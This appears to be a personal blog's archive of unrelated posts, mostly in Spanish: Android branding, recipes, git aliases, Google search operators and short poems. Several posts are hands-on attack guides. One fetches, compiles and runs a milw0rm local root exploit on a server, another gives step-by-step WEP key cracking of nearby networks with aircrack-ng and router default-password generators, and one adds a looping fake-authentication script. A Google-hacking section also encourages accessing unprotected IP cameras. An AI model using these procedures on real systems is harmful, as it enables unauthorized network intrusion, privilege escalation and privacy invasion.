Hace unos días he oído hablar sobre Google entorno a la gestión de sus marcas, en este caso reflexiones negativas entorno al nombre del desarrollo del sistema operativo para dispositivos móviles iniciado por google, Android.

Google pordría dejar de utilizar Android como marca ya que se está viendo que en el mercado muchas compañías como Samsung han incorporado este sistema operativo en su hardware. En este sentido, un usuario que adquiere un producto Samsung, solo ve un robot de color verde y un sistema operativo que funciona bien, a primera vista, normalmente, el usuario no técnico, solo entiende de usabilidad y asocia al robot de color verde con la marca de hardware, en este caso Samsung. Si el robot de color verde no se llamara Android y se llamara por ejemplo google mobile, Google adquiriría relación directa con el producto de software aunque se estuviera distribuyendo con otro hardware que no fuera de la marca Google, como Samsung, HTC, Huawei, etc…

Este podría ser uno de los motivos por los que Google quizás decida dejar de utilizar Android como nombre, no el sistema operativo, solo el nombre, con el fin de potenciar su marca de productos y servicios como Apple hace con sus productos y servicios, Iphone, por poner un ejemplo.

A continuación os recomiendo encarecidamente visualizar este hangout que habla sobre este tema y, de como este año 2013, se va a suceder una competencia importante ante la aparición de nuevos sistemas operativos como Firefox OS y Ubuntu for Phones, respaldados por proveedores de servicios como Teléfonica o Vodafone.

Esta receta es aproximadamente para unos 70 calçots

Ingredientes
Ñoras: 2 o 3
Tomates maduros: 4
Cabezas de ajo: 1
Almendras tostadas: 1 puño y medio
Avellanas tostadas: 1 puño
Vinagre: 1 vaso de café
Vino rancio: 1 vaso de café
Aceite

Preparación
- Cocemos las ñoras unos 20 minutos.
- Mientras cocemos las ñoras aprovechamos para asar los tomates y la cabeza de ajo.
- Mientras tanto podemos pelar las avellanas y las almendras.
- Una vez peladas las almendras y avellanas las pasamos por el picador con un poco de aceite y hechamos el resultado en un bol donde también mezclaremos el resto de ingredientes.
- A continuación, podemos sacar las ñoras, en caliente deberemos abrirlas y extraer la carne que está pegada a la piel, solo la carne y la ponemos en el bol junto con los frutos secos.
- Aprovechamos para trocear en el bol un diente de ajo crudo también.
- Una vez cocidos los tomates y la cabeza de ajo los pelamos y los vertemos al bol también.
- Ahora toca pasar las turmix, echamos medio vaso de vinagre y un vaso vino rancio y seguimos removiendo con la turmix.
- Finalmente tocará probar, ajustar los sabores y reducir el espesor al gusto, con aceite, vinagre y vino.

Bon Profit!

If you are using git from a bash terminal is interesting create aliases to reduce writing and win speed in your operations with this software version control.

For example, in your user’s home directory edit the .profile file and add:

if you don’t want reboot your computer simply do:

At this moment write gpom and git push origin master will be the same, with the alias gpom you’ll reduce 18 keyboard pulsations.

Here some useful aliases:

# Aliases for git

alias gup=’git pull’

Recuerdo a mi madre diciendo: “…tienes que compartir los juguetes…”

¿ Que es el ACTA ?

Si estas utilizando una versión debian like, es decir, con apt/dpkg, y de arquitectura i386 y quieres probar rapidamente el kernel de linux en su versión 3 aquí va una serie de instrucciones enlazadas para que copies y pegues en tu consola con permisos de administración, le des al enter y… a probar! :

wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.0-oneiric/linux-headers-3.0.0-0300_3.0.0-0300.201107220917_all.deb &&  wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.0-oneiric/linux-headers-3.0.0-0300-generic_3.0.0-0300.201107220917_i386.deb &&  wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.0-oneiric/linux-image-3.0.0-0300-generic_3.0.0-0300.201107220917_i386.deb && dpkg -i linux-headers-3.0.0-0300_3.0.0-0300.201107220917_all.deb &&  dpkg -i linux-headers-3.0.0-0300-generic_3.0.0-0300.201107220917_i386.deb &&  dpkg -i linux-image-3.0.0-0300-generic_3.0.0-0300.201107220917_i386.deb

Me he encontrado en la situación de tener que crear un enlace simbólico/symlink en una aplicación php que necesita de él para su funcionamiento. Resulta que el acceso al servidor se limita al protocolo ftp, por lo que no se puede crear o subir el necesitado enlace simbólico. La solución ha sido utilizar las funciones de php que generan symlinks, subir el código php y ejecutarlo desde el propio navegador por url, las librerías son las siguientes:

http://php.net/manual/es/function.symlink.php

<?php 
$objetivo = 'themed'; 
$enlace = 'theme'; 
symlink($objetivo, $enlace); 
?>

como véis son muy fáciles de utilizar… a mi me ha sacado de un apuro pues no teníamos acceso ssh/sftp para poder crearlo.

Recently in my job using MacOSx I discovered -with the help of my peers- an error on the system software updates. Googling and making some calls to our Internet Provider found the problem.

The cisco epc3825 router firmware have a bug managing the CRC of big files. In our particular problem the mac software updates need download files with an important size, when the operating system was installing the updates an error about the files integrity ocourred and the updates were impossible to install.

Other problems with the same source are ocurring in different operating systems, here some links aboute the problem:

http://www.neeo.es/index.php?option=com_content&view=article&id=8023:problemas-con-la-ultima-version-firmware-del-cisco-epc3825-de-ono&catid=1:noticias&Itemid=1381

http://www.redeszone.net/2011/07/17/problemas-con-el-cisco-epc3825-de-ono-con-la-ultima-version-de-firmware/

http://www.hard2mano.com/index.php?showtopic=91915

Finally the trouble was resolved changing the router by our Internet Provider which had the problem documented, free of course.

En el siguiente artículo relataré brevemente las posibilidades que nos ofrece google para realizar búsquedas, combinadas con un poco de ingeniería social, con el fin de filtrar un poco más nuestra búsqueda, afinar la puntería ante tal bastión de información de todo tipo que inunda la red de redes.

Un poquito de técnica no nos vendrá nada mal:

Las comillas dobles:
“mi patrón de búsqueda”
Nos encontrará exactamente páginas que contengan lo que pongamos entre las comillas dobles. Si pusiéramos el patrón de búsqueda sin las comillas dobles nos encontraría páginas que contuviesen esas dos palabras independientemente de si se están unidas o no, es decir, pueden estar disueltas en todo el contenido de la página.

Los dos puntos seguidos:
Nos permite establecer rangos de números en nuestras búsquedas, por ejemplo si quisiéramos buscar la publicación de algún exploit para windows entre 1990 y 1993 lo haríamos así:
“exploit for windows” 1990..1993
Aunque no nos encuentre nada entre ese rango de números google suele entender que estas buscando un rango de fechas por lo que te muestra alguna coincidencia de alguno de los elementos del rango, muy útil si son fechas lo que buscamos.

Los comodines:
Podemos utilizar los asteriscos como comodines, por ejemlo: “en un lugar de la *” sino recordamos una palabra de una frase nos viene de perlas.

Usar google como calculadora:
También podemos utilizar google como calculadora, es un poco absurdo teniendo software de calculadora o nuestros dedos pero realiza los cálculos que le pasemos, en alguna ocasión que necesitemos calcular rapidamente algo y ya estemos con el navegador abierto y en la web de google search puede sernos útil, por ejemplo: (24+2)/2 * 2 + 4 – 1

Encontrar definiciones:
Le podemos pasar como parámetro de búsqueda “define” para encontrar definiciones de acrónimos o palabras específicas: define:SA

Saber quien enlaza a quien:
Podemos utilizar el operador “link” para saber quien está enlazando la web o dominio que le pasemos como parámetro: link:wikileaks.org nos devuelve aquellas publicaciones, o webs que contienen un enlace a wikileaks.org

Buscar en la etiqueta title de las webs:
Podemos filtrar nuestros resultados buscando en la etiqueta title de html lo que estamos buscando, por ejemplo si queremos buscar webs que en su title contenga “como ganar dinero” lo haremos así: intitle:”como ganar dinero sin trabajar”

Filtrar por nivel de dominio:
Consiste en filtrar por el nivel de dominio, por ejemplo si queremos buscar la palabra javikal en dominios .com lo haremos así: javikal site:com

Busquedas en las url (direcciones):
Existe otro operador que nos permite filtrar buscando nuestro patrón en las direcciones/dominios de Internet, por ejemplo, si quiero buscar un dominio que contenga las palabras crisis culpables lo podemos hacer de la siguiente manera: inurl:crisisculpables

Algunos ejemplos prácticos:
Combinando los operadores básicos que tenemos a nuestra disposición para filtar las búsquedas y un poco de imaginación podemos encontrar cosas realmente intereseantes como:

Cámaras IP sin protección con acceso a visualización o incluso con acceso a los controles de la cámara, alucinante y muy divertido. Esto es gracias a la conjugación de operadores de google con conocimientos técnicos, sabiendo las urls que generan ciertas cámaras ip podemos buscar en google esas urls y encontrar cosas como estas:

Ahora vamos a buscar, a modo de ejemplo, material en pdf sobre google hacking posteado este año 2011:
“google hacking” pdf 2011

Como habréis observado la potencia reside en la conjugación de ingeniería social con técnicas de búsqueda básicas.

Enlaces de interés:
http://www.googleguide.com/advanced_operators.html
http://en.wikipedia.org/wiki/Google_hacking
http://es.wikipedia.org/wiki/Ingenier%C3%ADa_social_%28seguridad_inform%C3%A1tica%29
http://www.segu-info.com.ar/articulos/42-google-hacking.htm
http://www.acunetix.com/websitesecurity/google-hacking.htm
http://johnny.ihackstuff.com/
http://www.stachliu.com/resources/tools/google-hacking-diggity-project/attack-tools/
http://www.i-hacked.com/content/view/81/42/

de la mar el mero
y de la tierra el cordero

Ingredientes:

• Aceite de oliva
• 500gr de zancarron
• 2 dientes de ajo
• 1 zanahoria
• 1 pimiento verde
• 2 patatas
• 1/2 tomate sin piel
• 1 pasti de starlux
• vino blanco o coñac

Preparación:

Onin!

Ahí va un pdf completo completo con muchísimos pintxos con denominación de orígen, clicka aquí para descargarlo. Bon profit!

Untarse los pies con vicks vaporub y posteriormente ponerse unos calcetines. Sorprendente pero funciona.

Pues sencillamente cortamos una cebolla por la mitad y la dejamos toda la noche encima de nuestra mesita de noche.

Ingredients:

1 yogur de llimona, també utilitzarem la mesura del yogur.
2 mesures de sucre
3 mesures de farina
3 ous
1/2 mesura d’oli suau d’oliva
1 sobre de levadura

Preparació:
* Precalentem el forn mentre preparem a uns 170 graus va bé.
* Per fer la barreja agafem un bol amb capacitat per 2l aproximadament, una forquilla va bé per barrejar.
* Recordeu que una mesura = la quantitat que hi quep a un yogur de llimona.


[1] Fiquem el yougur de llimona i el barrejem amb tres mesures de sucre.

[2] A continuació li fiquem els 3 ous i barrejem fins que quedi uniforme.

[3] Despés barrejem tres mesures de farina.

[4] Ara toca ficar-li el sobre de levadura i una mica més de la meitat d'una mesura d'oli.

[5] El temps al forn depèn de cada forn... jo li fico entre 30-45 minuts.


Bond Profit!

Ingredientes:

1L de Nata para montar
2 sobres de cuajada
3 cucharadas de azúcar
2 vasos de leche
Caramelo líquido

Preparación:

[1]Poner a cocer 1L de Nata y un vaso de leche.
[2]Aparte, en un vol diluír 1 vaso de leche, 3 cucharadas de azúcar y 2 sobres de cuajada.
[3]Cuando empiece a hervir [1] echar en el mismo cazo [2] y dejarlo un poco todo junto hirviendo (1 o 2 minutos).
[4]En un molde echar caramelo líquido en el fondo a continuación lo que hemos hervido y arriba podemos echar gallaetas maría que harán de base.
[5]Cuando haya enfríado meterlo en la nevera y en 4 horas estará listo.

Ingredientes para unas 3-4 personas:

- Una botella de vino blanco
- 400g de champiñones
- 150-200g de Jamón serrano
- Una cebolla
- Harina

Preparación:

[1] Doramos los champis (cortados al gusto) con la cebolla (cortada al gusto) ∞ 8min
[2] Échamos el jamon serrano (cortado al gusto) ∞ 2min
[3] Échamos media botella de vino o lo que veamos para que quede bien cubierto de vino todo ∞ titá
[4] Cuando el vino esté caliente echar la harina, 3 o 4 cucharadas de sopera
[5] Dejar reposar a fuego medio controlando el espesor de la salsa que irá quedando ∞ 10-15min


A comer!

ondeandose,
el orgasmo infinito,
agua, arena y sol

testing wordpress from android mobile phone…

A lo largo de pruebas y más pruebas, de fracasos y éxitos quizás os sirva lo que a continuación os explico. En un escenario en el que queremos obtener una clave WEP donde no tenemos clientes conectados aireplay-ng no ofrece la posibilidad de realizar una falsa autenticación con el punto de acceso, por lo que nosotros mismos podemos ser ese cliente que no está conectado y que nos vendría genial para hacer un ataque Standard ARP-request replay, el famoso -3.

Pues bien, lo que a continuación os muestro sirve para dejar persistente el ataque de falsa autenticación y mantenernos como un cliente constantemente conectado hasta finalizar el ataque Standard ARP-request replay, es tan sencillo como meter el ataque en un bucle en un script de bash, por ejemplo:


#!/bin/bash
#For persistent attacks
while (true)
do
aireplay-ng -e Essid -a MacDelPuntoDeAcceso -1 1 InterfazPromiscua
done


Este sencillo script nos mantendrá el ataque constantemente incluso cuando caiga lo volverá a iniciar, a mi me ha resultado genial en los escenarios en los que la falsa autenticación funciona a medias y aireplay-ng se va cayendo.

PD ::: haciendo este post encontré este manual en castellano de la suite aircrack que quizá también os sirva.

Ultimamente estamos viendo como exponencialmente se empieza ha hablar y utilizar la tecnología del Cloud Computing como un camino hacia el futuro irremediable. A continuación os dejo una charla que analiza el fenómeno del Cloud Computing y lo peligroso que puede llegar a ser, también presenta una alternativa libre que utiliza la misma tecnología salvaguardando nuestra privacidad: eyesos.

Web de eyeos.

Ahí van algunos enlaces muy interesantes para la autogestión de las energías renovables:

Desde molinos de viento a hydro turbinas: IR

Cocina Solar: IR

Casas de paja: IR

A continuación explicaré muy brevemente una forma sencilla de hacernos con una shell de root en un sistema GNU/Linux a través de un usuario estandard sin privilegios con acceso por ssh o local shell.

Primero de todo necesitaremos un compilador de C y el siguiente exploit:

apt-get install gcc && wget http://www.milw0rm.com/exploits/9479

A continuación compilamos el exploit:

gcc 9479.c -o exploit

Y lo ejecutamos:

./exploit

Si todo ha ido bien dispondremos de una shell de root, a la hora de editar ficheros con vim, por ejemplo, he tenido que forzar la escritura w! por lo demás igual que si fuera root.

Os recomiendo que compiléis el exploit en el mismo sistema al que queráis escalar, es decir, si quiero utilizar el exploit en una Debian Lenny compilaré previamente el exploit en mi sistema Debian Lenny o máquina virtual en su defecto y posteriormente subir el fichero al servidor y ejecutarlo.

Introducción

Presentado en 1999, WEP, acrónimo de Wired Equivalent Privacy o “Privacidad Equivalente a Cableado”, es un sistema de cifrado que permite cifrar la información que se transmite proporcionando confidencialidad. Existe la posibilidad de cifrar la red mediante un cifrado de 64 o 128 bits. En 2001 se descubrieron varias vulnerabilidades que permiten recomponer la contraseña del algoritmo con el que se cifran los datos de la red pudiendo acceder a ella y ver limpiamente todo el tráfico de ésta.

Una red Wireless (comunicación inalámbrica, sin cables) se transmite por radiofrecuencia, las comerciales suelen irradiar a 2,4GHz, es la misma frecuencia con la que vibra el microondas o el H2O (agua) por eso si entre el emisor y el receptor se encuentra agua en forma de lluvia por ejemplo, las ondas emitidas son absorbidas por el agua dejando al receptor en ascuas. Pensemos en una radio, para escuchar la radio necesitamos un sintonizador y poder así escuchar las diferentes emisoras, con la tecnología Wireless pasa exactamente lo mismo, para poder escuchar (ver los paquetes de otra red) necesitaremos un sintonizador, en este caso, uno que sintonice a una frecuencia de 2,4 GHz. Muchos portátiles los llevan integrados pensando en la movilidad de estos, por eso, podemos ver las diferentes redes Wireless que existen a nuestro alrededor, generalmente las que están transmitiendo a una distancia aproximada 100 metros en los dispositivos comerciales y lo hacen de forma omnidireccional (a la redonda). Para los equipos de sobremesa podemos adquirir una tarjeta de red inalámbrica en nuestro proveedor de hardware favorito o reciclarla de la calle o nuestra deixalleria favorita, alguna placas madre también las llevan integradas. Normalmente cuando abrimos nuestro cliente de redes Wireless nos encontramos que detecta de forma general dos tipos diferentes:

Este artículo se refiere a las redes inalámbricas cifradas con WEP y a continuación se explicará como obtener la contraseña del algoritmo de cifrado no sin antes hacer una pequeña reflexión de porque hoy en día a más de 8 años de saberse públicamente la vulnerabilidad de estas redes nuestros proveedores de servicios a los que pagamos siguen vendiendo o alquilándonos sus routers y puntos de acceso con este algoritmo VULNERABLE por defecto dejando nuestra privacidad al alcance de cualquiera que le interese aprender como romper el cifrado. Pues bien, las respuestas que me he dado de el porqué de esta dejadez responden a que los beneficios están por encima de todo y a la funcionalidad total de los productos que ofrecen los ISP. Cuando me refiero a beneficios me refiero a precariedad laboral y tiempo, actualmente cuando se acerca nuestro instalador de ADSL lo único que tiene que hacer es enchufar el cable de teléfono al router y el RJ-45 a nuestro ordenador como mucho, puesto que si no utilizamos cable de red solo necesitaremos la contraseña para acceder a la red que normalmente se encuentra en la parte inferior del dispositivo. Si utilizamos cable la red inalámbrica suele estar activada también por lo que quedamos expuestos aunque utilicemos cable ya que nuestro dispositivo está emitiendo además por radiofrecuencia, en el caso que el dispositivo sea router + punto de acceso (con antenita). Es decir, por defecto, el dispositivo que nos traen a casa tiene la red inalámbrica activada con WEP y con una contraseña de fábrica tanto para acceder al dispositivo como la del algoritmo de encriptación. Por otro lado cuando hablo de la funcionalidad de los productos me refiero a que el algoritmo WEP suele estar soportado por la mayoría de sistemas operativos y si por defecto, en los dispositivos que nos traen a casa, estuviera WPA, por ejemplo, algunos clientes necesitarían instalar el soporte para este algoritmo y ser funcional. Si el cliente tiene que estar preocupándose de instalar o simplemente no funciona a la primera sin hacer nada, cuestiona la profesionalidad de la compañía, sus servicios, su imagen… por eso los ISP prefieren ofrecer algo VULNERABLE pero funcional sí o sí y asegurarse la venta, el dinero lamentablemente está por encima de la profesionalidad y peligrosamente por encima de la privacidad de millones de personas.

Escenario 1

Sistema Operativo: Debian Lenny
Tarjeta de Red Inalámbrica: Atheros Communications Inc. Atheros AR5001X+ Wireless Network Adapter (rev 01)
Redes Inalámbricas con uno o más clientes conectados, con cifrado WEP, autenticación abierta, sin filtro MAC y con DHCP activo en el dispositivo.
Para realizar el ataque necesitaremos una Tarjeta de Red Inalámbrica que el chipset permita ponerla en modo promiscuo o monitor y pueda inyectar paquetes, tenéis una lista aquí.

Y la suite aircrack, desde un terminal:
apt-get update && apt-get install aircrack-ng

Primer paso, seleccionamos objetivo

Poner nuestra tarjeta de red en modo monitor o promiscuo, dependiendo de la tarjeta de red inalámbrica se realizará de una manera u otra (googlead poniendo mode monitor + chipset de vuestra tarjeta de red), o simplemente ejecutando airodump-ng cambiará el mode automáticamente, para saber vuestro chipset en un terminal escribid:

lspci | grep Ethernet

Fijaos que pueden aparecer dos, la cableada y la wireless, normalmente en la wireless suele aparecer “Wireless Network Adapter”.

Vamos a ver que redes detectamos y pueden ser susceptibles para realizar nuestro ataque, para ello ejecutaremos airodump-ng con los siguientes parámetros y como root o usuario con los privilegios adecuados en un terminal bash:

airodump-ng -w Aver eth1

-w Le indicamos el nombre del fichero donde guardará los paquetes sniffados, Aver es el nombre del fichero, podemos poner cualquier nombre.

eth1 es el nombre de nuestra interface de red inalámbrica, con el comando iwconfig podéis ver el nombre asignado a vuestros dispositivos de red inalámbricos.

Nos aparecerá algo parecido a esto:

Para que os situéis un poco explicaremos la salida que acabamos de obtener:

En la cabecera SUPERIOR (datos del punto de acceso/router):
CH número: nos dice el canal que está escuchando.
Elapsed: el tiempo que lleva capturando.
BSSID: La MAC del punto de acceso.
PWR: La intensidad de la señal, dependiendo del chipset lo presenta de una manera u otra, en este caso en negativo.
Beacons: Paquetes de red para la visualización de la red + tráfico.
Data: Los paquetes que contienen en su trama el vector de inicialización con el que recompondremos la contraseña, llamados IV’s.
CH: Canal por el que transmite la red.
MB: Velocidad de la red, 54 es 54M/s.
ENC: Algoritmo de encriptación que utiliza, WEP es el vulnerable.
CIPHER: Cifrado que utiliza bajo el algoritmo especificado anteriormente en ENC.
AUTH: Autenticación utilizada entre cliente y servidor.
ESSID: Nombre de la red.

En la cabecera INFERIOR (datos de los clientes):
BSSID: MAC del punto de acceso.
STATION: MAC del cliente asociado al punto de acceso (alguien está conectado).
PWR: Intensidad de la tarjeta del cliente (a mayor intensidad más cerca nuestro se encuentra).
Packets: Paquetes generados por la tarjeta de red del cliente.
Probes: Nombre de la red a la que está conectado el cliente.

Como podemos observar en la cabecera inferior hay dos personas que estan conectadas a dos puntos de acceso diferentes, además uno de ellos está generando tráfico de paquetes IV’s (49 paquetes). Este podría ser un buen objetivo para nuestro ataque, necesitamos recoger la siguiente información para realizarlo, toda esta información la podemos recoger de la salida anterior en la cabecera inferior y superior. La MAC del router/punto de acceso (BSSID), el canal por el que transmite (CH), la MAC del cliente (STATION), el nombre de la red (ESSID). Por lo tanto sabemos que la red escogida se llama WLAN_XX, transmite por el canal 11, tiene un cliente conectado con MAC 00:19:E0:XX:XX.XX, y la MAC del router es 00:01:38:XX:XX:XX. Las X las sustituiremos por los números correspondientes a nuestro escenario real.

Segundo Paso, capturando

Una vez escogido el objetivo que se ajusta al escenario que presentamos en este artículo (WEP + cliente), pasaremos a sniffar el tráfico de red e inyectar tráfico a la red para capturar más rápidamente los paquetes “Data (IVs)” que son los que nos interesan.

En la terminal que tenemos abierta cerraremos el airodump-ng por ejemplo presionando CTRL+C, y nos dispondremos a relanzarlo pero especificando esta vez las opciones para nuestro objetivo, así pues, quedaría de la siguiente forma:

airodump-ng -w CapturaFinal -c 11 eth1

Ahora airodump-ng capturará los paquetes de la red que esté transmitiendo por el canal 11, si hay más de una red también las del resto, necesitamos especificar el canal para poder inyectar paquetes.

Tercer Paso, inyectando

Ya con el airodump-ng relanzado abrimos otra pestaña de nuestro terminal o uno nuevo para ejecutar paralelamente aireplay-ng que es quien inyectará a la red paquetes para capturar más rápidamente. Lo haremos con los datos recogidos para nuestro objetivo:

aireplay-ng -b 00:01:38:XX:XX:XX -x 1024 -h 00:19:E0:XX:XX:XX -3 eth1

-b BSSID (MAC del punto de acceso).
-x número de paquetes por segundo.
-h STATION (MAC del cliente).
-3 ataque mediante ARP.
eth1 tu interfaz de red inalámbrica.

Y verás algo así:

aireplay-ng cambiará la MAC de vuestra tarjeta de red por la del cliente y comenzará a recoger paquetes, cuando tenga paquetes ARP se pondrá a inyectar tráfico como si fuerais vosotros quienes estáis conectados al punto de acceso, es decir, generará paquetes válidos y los inyectará a la red. Si todo ha ido bien en el airodump-ng observareis como los paquetes aumentan exponencialmente tanto los Beacons como los Data (los que nos interesan).

Cuarto Paso, recomponiendo la contraseña

Por último nos falta obtener la contraseña que obtendremos mediante aircrack-ng pasándole como parámetro el fichero en el que estamos capturando los paquetes:

aircrack-ng CapturaFinal-01.cap

Si en el canal había más de una red nos hará escoger de una lista la que queramos crackear, seleccionaremos presionando el número de la lista que pertenece a la red que queremos crackear. A continuación aircrack-ng se pondrá manos a la obra y si tenéis los paquetes que necesita (unos 500.000 para una red cifrada con WEP de 64 bits y 800.000 en el caso de que esté cifrada con WEP de 128 bits) os mostrará la contraseña de la red en hexadecimal y ASCII:

Y voilá ya tenemos la contraseña, ahora, si no hay otro método de seguridad que proteja la red deberíamos poder conectarnos a ella sin problemas.

Escenario 2, más sencillo todavía con wlandecrypter

wlandecrypter es una herramienta que genera las posibles contraseñas que los routers de Telefónica pueden tener por defecto. Así es, muchos proveedores de servicios de Internet siguen un patrón para generar sus contraseñas y nada difícil de estudiarlo es.

Tan solo tenemos que seguir los mismos pasos que en el Escenario 1 hasta el Paso 2. A continuación en vez de inyectar tráfico tan solo tendremos que combinar el aircrack-ng con el fichero de contraseñas que nos genera wlandecrypter, tener claro que este programa es para los routers de telefónica, es decir todas las redes cuyo nombre sea del tipo WLAN_XX, para otras compañías existen programas análogos como jazzteldecrypter. En la LIVECD de Wifiway encontraréis varios preparados para utilizarlos y con GUI.

Para generar el fichero de contraseñas mediante consola hemos de pasarle como parámetros el BSSID, la ESSID y el fichero donde queremos que nos guarde las posibles contraseñas:

wlandecrypter 00:01:38:XX:XX:XX WLAN_XX contraseñas.txt
[+] ESSID: WLAN_XX
[+] BSSID: 00:01:38:XX:XX:XX
[+] Modelo: Xavi 7768r
[+] Fichero de claves: contraseñas.txt
[+] Fichero guardado OK


Sinó le indicamos la carpeta por defecto nos dejará el fichero en la carpeta donde nos encontremos.

Por último combinamos aircrack-ng con el fichero de contraseñas:

aircrack-ng CapturaFinal-01.cap -w contraseñas.txt

E voilá!

Consejos

Vuestra tarjeta de red inalámbrica:
Existen diferentes chipsets compatibles con la suite aircrack-ng pero no todos funcionan igual, observar en la lista de tarjetas de este artículo las características de cada una y escoged la que más os interese en función de lo que necesitáis.

La tarjeta de red inalámbrica del cliente (STATION):
No todas las tarjetas de red funcionan bajo el ataque aireplay-ng de la misma manera, así que si teneis más de un cliente conectado al objetivo probad con otra, es decir cambiad la STATION por la de otra tarjeta de red conectada a la red objetivo, quizás con un poco de suerte tenga otra tarjeta que haga funcionar correctamente el ataque.

Medidas preventivas para redes inalámbricas

En el Punto de Acceso si el firmware lo permite disponemos de varias técnicas que ofrecen una mayor seguridad a los usuarios de la (W)LAN.

Discriminación por MAC: Lista de las MAC’s de los clientes a los que permitiremos conectarse a nuestra red.
Ocultar ESSID: Oculta el nombre de la red aunque capturando unos cuántos paquetes se hace visible.
Algoritmo de cifrado: WPA2 es bastante difícil de acceder.
Deshabilitar DHCP + Rango IP: Que el router no dé IP’s y establecer un rango poco común como 22.1.7.0.

Enlaces

LIVE CD’s:
[WifiWay] [BackTrack]

Video tutoriales:
[1] [2]

Comunidades:
SeguridadWireless
ListaComunidades

Es indiscutible la potencia de Shell Scripting bajo GNU/Linux, la destreza que te aporta conocer como utilizar la línea de comandos para todo lo que se te imagine es infinita así como la velocidad para realizar, compartir, enviar incluso más rapidamente respecto a cualquier entorno gráfico. Este post no va dedicado precisamente a Shell Scipting sinó a algunas herramientas que podemos utilizar bajo la línea de comandos para facilitarnos aún más la tarea de administrar un sistema incluso recursos de entornos gráficos, la maravilla del conjugar. Hablo de herramientas basadas en una biblioteca de programación llamada ncurses, quizás nos suene de haber compilado el kernel en alguna interminable noche pero ésta sirve para muchas más cosas:

rcconf

Utilidad para configurar los servicios a iniciar durante el tiempo de arranque, es el front-end de update-rc.d

alsamixer

Programa de mezclado de audio para la arquitectura de sonido ALSA. Sirve para configurar sonido y ajustar volúmenes.

modconf

Nos sirve para cargar y descargar módulos manualmente, parecido a rcconf pero para manejar el kernel sin tener que recompilarlo cada dos por tres.

wavemon

Monitor en tiempo real para redes inalámricas, nos dá información respecto a la señal, el ruido, estadísticas de paquetes, configuración de la red.

El ADN de la burbuja inmobiliaria from Afectadosporlahipoteca on Vimeo.